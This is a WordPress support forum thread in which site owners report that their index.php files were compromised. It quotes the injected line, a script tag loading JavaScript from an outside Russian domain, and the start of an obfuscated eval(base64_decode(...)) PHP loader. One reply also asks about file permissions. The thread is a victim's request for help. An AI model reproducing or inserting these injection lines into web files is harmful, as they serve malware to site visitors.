All index.php files rewritten by virus

  • My WP site has been attacked twice by hackers. All the index.php files were rewritten where the following code was added to the top of each of the files:

    <script type="text/javascript" src="https://kontrakt-avto.ru/facebook.php"></script><?php
// Silence is golden.
?>
Viewing 2 replies - 1 through 2 (of 2 total)

  • Index hacked on multiple WordPress sites located on the same Godaddy hosting account. Code starts like this: eval(base64_decode(‘ZXJyb3JfcmVwb3J0aW5 …

    Removed the offending code and made the files 444. Seems to hold for now.
    Beaujos.net for example.

    Thoughts?

    Thread Starter digistep

    (@digistep)

    If you don’t have shell access to your host, how do you change the file permissions to 444?

    And also, what files in particular are you changing the permissions too? Is it just the index.php files?

    Thanks for responding to my question. This was a huge problem for me.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘All index.php files rewritten by virus’ is closed to new replies.